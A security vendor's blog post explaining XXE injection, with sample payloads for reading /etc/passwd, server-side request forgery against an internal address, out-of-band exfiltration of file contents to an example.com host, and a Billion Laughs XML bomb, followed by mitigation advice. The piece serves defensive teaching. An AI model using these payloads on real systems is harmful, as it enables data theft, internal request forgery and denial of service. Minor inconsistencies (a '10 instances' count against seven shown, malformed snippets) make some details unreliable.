An XML (Extensible Markup Language) External Entity or XXE attack occurs when an attacker is able to exploit the application’s processing of XML data by injecting malicious entities. An application is vulnerable when it faithfully includes and processes the referenced external entity regardless of its origin, permitting the injection attack to succeed. In order to really understand the vulnerability, we will need to look at how XML is constructed and used, how vulnerabilities in parsers can be exploited, and summarise how best to prevent XXE injection attacks.
We will start up by taking a step back and reviewing what XML is and where its used, in order to present the context for how vulnerabilities may be introduced.
A challenge encountered relatively early in the history of computing was the requirement, driven initially by early publishing software, to provide document templating, layout and typesetting within a homogeneous document format – precursor requirements for today’s WYSIWYG (“what you see is what you get”) software used in web applications such as blogs. Later developments led to clear distinction between structure and presentation of documents.
An early example (a markup language known as Scribe) is shown below, with “markup” syntax using lines beginning with “@” characters to providing distinguishing annotation to separate instructions on document structure from the actual text, meaning that when the document is processed for display, the markup language is not shown, and is only used to format the text:
@Heading(The Beginning) @Begin(Quotation) Let's start at the very beginning, a very good place to start @End(Quotation)
Extensible Markup Language (XML) is a more modern markup language that emerged in the late 1990s, coinciding with the widespread adoption of the internet and the world wide web into domestic and commercial contexts. Similar to earlier precursors, XML defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is used widely still within a number of areas, including:
Let’s take a look at a basic XML example:
<?xml version = "1.0" encoding = "UTF-8" standalone = "yes"?> <userInfo> <firstName>John</firstName> <lastName>Doe</lastName> </userInfo>
This probably looks fairly familiar in that it is similar to a basic HTML document, which is no coincidence since both HTML and XML are ultimately derived from the same root – SGML (Standard Generalized Markup Language).
In this next example we have a slightly more complicated XML document that includes a DTD (highlighted):
xml version = "1.0" encoding = "UTF-8" standalone = "yes"? <!DOCTYPE foo [ <!ENTITY NEWSPAPER "The Example"> <!ENTITY PUBLISHER "Example Press Ltd"> ]> <userInfo> <firstName>John</firstName> <lastName>Doe</lastName> </userInfo>
The highlighted lines form what is called the Document Type Definition, or DTD. This is a precursor to the main body of the document that follows. The DTD consists entirely of data that is outside of both markup and content that will be rendered. It supplies in this basic example just two entities, however the DTD can contain a more substantial set of declarations relating to the document structure with a list of elements and attributes.
Entities are similar to variables that are used in programming languages. They permit an XML document to store (or retrieve) information that is used later in the document. The entity declaration assigns it a value that is retained throughout the document and act largely to provide data normalisation – reducing duplication and the possibility of typos, ensuring consistency, reducing document size and improving legibility by human readers of an XML document. In general, there are two types: internal and external. We will look at a simple internal entity example first:
<?xml version = "1.0" encoding = "UTF-8" standalone = "yes"?> <!DOCTYPE foo [ <!ENTITY firstName "John" > <!ENTITY lastName "Doe" > ]> <userInfo> <firstName>&firstName;</firstName> <lastName>&lastName;</lastName> </userInfo>
Here we have defined an entity “firstName” and then referred to it later in the actual document by inserting the entity name preceded by an ampersand (&) and followed by semi colon (;), where it will be populated when parsed and result in the following data structure:
<userInfo> <firstName>John</firstName> <lastName>Doe</lastName> </userInfo>
External entities are slightly more complex in that they allow reference to external storage objects – objects outside the context of the document itself – by means of an identifier known as a URI that provides their source (e.g “https://www.example.com/john.xml ” ). Here is an example:
<?xml version="1.0" standalone="no" ?> <!DOCTYPE foo [ <!ENTITY ent SYSTEM "https://www.example.com/john.xml"> ]> <userInfo />&ent;</userInfo>
When parsed the content of https://www.example.com/john.xml is included in the datastructure.
By now, hopefully it is becoming clear what can go wrong. You’ll be sat there with your “attacker” hat on, thinking “but what if we could control where the entity reference pointed?”
XXE vulnerabilities arise because the XML specification contains these external entity references, parsers often enable these features by default (or the developer may have enabled them intentionally), and user controlled XML data is submitted to the parser. These flaws can potentially be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.
These vulnerabilities all arise because typically an attacker is in control of the XML document presented to the system, in a client-server interaction. In a typical HTTP interaction, a user (client) submits a relatively simple request for a resource or document on the server – the request contains little more than the HTTP verb and protocol version, the path, optionally some headers and parameters. It is only the server that gets to respond with a richly formatted HTML-format document.
In typical XML applications however, a client will commonly send an XML payload as part of their request and the server will pass the payload through an XML parser. A malicious attacker is able to substitute expected external entity values for those outside the context of those the system is naively expecting input to be limited to, or insert entities which were unexpected. Let’s take a look at some specific examples of how the external entities can be exploited if the attacker has control over the document generation:
In a file disclosure attack, the attacker inserts a URI into their submitted XML payload that makes use of a a scheme (e.g “http://” or “file://”) and path (eg “/etc/passwd”) that are outside the context that the developer of the system was expecting. In this instance they instead choose to have the entity refer to a local file scheme and path rather than to intended remote URL endpoints, for example:
<?xml version="1.0" standalone="no" ?> <!DOCTYPE replace [ <!ENTITY entity SYSTEM "file:///etc/passwd"> ]> <userInfo> <firstName>John</firstName> <lastName>&entity;</lastName> </userInfo>
That above example is intended by its developer to simply substitute a last name from an entity. However an attacker has altered the XML document in order to have it read a file which defines system users from the local filesystem of the system processing the XML document and include this in the lastName field.
SSRF occurs when an attacker can cause the server to make a request to another service dictated by the attacker. See our previous post for a more detailed discussion of Server Side Request Forgery (SSRF).
There are several areas within the XML specification that permit the document to specify a URI which the parser will request when processing the document, one of which is within the XML external entities. For example, the following document will cause a vulnerable system to request http://10.1.2.3/users/delete/all:
<?xml version="1.0" standalone="no" ?> <!DOCTYPE replace [ <!ENTITY entity SYSTEM "http://10.1.2.3/users/delete/all"> ]> <userInfo> <firstName>John</firstName> <lastName>&entity;</lastName> </userInfo>
Note that it does not matter if the response from the HTTP request is included in the response to the user in this attack, as the objective is to cause the server to issue the HTTP request.
The advantage this provides the attacker is that the vulnerable system may have a more privileged position in relation to the target, in the example above 10.1.2.3 is a private network address which the vulnerable system can access on its network, but the attacker cannot reach directly across the internet.
Another variant of this attack is to specify a domain under the attacker’s control and monitor for DNS and HTTP requests which indicate the system is processing entity. In the following example the attacker would own example.com and monitor for DNS requests and HTTP requests for ASDF123.example.com, knowing that the only place ASDF123.example.com is referred to is in their payload, so if any requests are received the entity has been processed and the system is vulnerable.
<?xml version="1.0" standalone="no" ?> <!DOCTYPE replace [ <!ENTITY entity SYSTEM "http://ASDF123.example.com/"> ]> <userInfo> <firstName>John</firstName> <lastName>&entity;</lastName> </userInfo>
In classic XXE attacks with the aim of recovering data, the system needed to serve the parsed XML document back to the user in order to be considered vulnerable. However a more recent technique is to make use of parameter entities to construct an entity which will send the file content to the attacker’s server out of band, side stepping the requirement to return the data to the user in band.
A parameter entity has a similar syntax to a regularly entity, the pertinent differences being the user of % rather than & and they can only be used within the DTD.
One method of using this technique is as follows:
The attacker hosts a file such as the following:
<!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % param1 "<!ENTITY external SYSTEM 'http://example.com/log_xxe?data=%payload;'>"> And then send this payload to the server: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root[ <!ENTITY % remote SYSTEM "http://example.com/xxe_1 > %remote; %param1; ]> <foo>&external;</foo>
When this payload is parsed, the system will:
Another XML attack to be aware of (technically not XXE since the entities are not external to the DTD) is the execution of a Denial of Service (DoS) attack against the processing service endpoint via entity manipulation. One simple way in which this can be exploited is to perform an “entity unpacking” attack to use recursion to provide an exponentially long string, this is usually referred to as a Billion Laughs Attack or XML Bomb.
<!--?xml version="1.0" ?--> <!DOCTYPE refs [ <!ENTITY ref1 "ref"> <!ENTITY ref2 "&ref1;&ref1;&ref1;&ref1;&ref1;&ref1;&ref1;"> <!ENTITY ref3 "&ref2;&ref2;&ref2;&ref2;&ref2;&ref2;&ref2;"> <!ENTITY ref4 "&ref3;&ref3;&ref3;&ref3;&ref3;&ref3;&ref3;"> <!ENTITY ref5 "&ref4;&ref4;&ref4;&ref4;&ref4;&ref4;&ref4;"> <!ENTITY ref6 "&ref5;&ref5;&ref5;&ref5;&ref5;&ref5;&ref5;"> <!ENTITY ref7 "&ref6;&ref6;&ref6;&ref6;&ref6;&ref6;&ref6;"> <!ENTITY ref8 "&ref7;&ref7;&ref7;&ref7;&ref7;&ref7;&ref7;"> <!ENTITY ref9 "&ref8;&ref8;&ref8;&ref8;&ref8;&ref8;&ref8;"> <tag>&ref9;</tag>
In the attack type seen in this example, the tag contains an entity reference to entity “ref9”. The parser diligently finds the contents of entity ref9 and finds that it contains 10 instances of ref8, which in turn contains 10 instances of ref7 etc. In attempting to build up the concatenated string to populate ref9 with, the server has to concatenate 7^9 strings containing “ref” – 40353607 strings total. In attempting to process this, the parser may run out of memory or – in more complex variants – simply consume valuable CPU capacity.
Alternatively attempting to read a data stream from an object on the Linux filesystem that is addressable via a standard filepath URI and provides an unlimited stream of random characters such as /dev/urandom on a Linux system may also cause denial of service.
The best fix for XXE and DTD vulnerabilities is relatively simple in that they are not typically used within most systems and can be safely disabled server-side via a configuration parameter. Newer versions of XML processors and libraries often disable these by default.
If External Entities are required and user input is used to form an XML document rather than the XML document originating from the user, then the protection measures that may be effective are those used in preventing other injection attacks relying on untrusted user input, such as SQL Injection and Cross Site Scripting (XSS).
You should sanitise input, ideally against a type, or if not then against a white-list regex of allowed values. For example, if you’re asking for someone’s name, then you could for example allow only upper case and lower case alphabet plus a few other characters – there’s no names with “<” in, for example.
However, this is simpler for some parameters and form fields than others. If you are processing a parameter representing a numeric item ID, then simply checking the type is an integer may be simple and sufficient. For other data that is richer, this is more difficult, and sanitisation is of more limited value for such parameters – when you sanitise input, you risk altering the data in ways that might make it unusable. Input sanitisation is therefore generally avoided in cases where the nature of the data is unknown, such as free-form text entry fields, especially if these may legitimately contain complex data sets such as code samples.
Developer training is also highly beneficial in order to raise awareness in how to identify and mitigate XXE.
AppCheck help you with providing assurance in your entire organisation’s security footprint. AppCheck performs comprehensive checks for a massive range of web application vulnerabilities from first principle to detect vulnerabilities – including XML External Entity vulnerabilities – in in-house application code. AppCheck also draws on checks for known infrastructure vulnerabilities in vendor devices and code from a large database of known and published CVEs. The AppCheck Vulnerability Analysis Engine provides detailed rationale behind each finding including a custom narrative to explain the detection methodology, verbose technical detail and proof of concept evidence through safe exploitation.
As always, if you require any more information on this topic or want to see what unexpected vulnerabilities AppCheck can pick up in your website and applications then please get in contact with us: firstname.lastname@example.org
No software to download or install.
Contact us or call us 0113 887 8380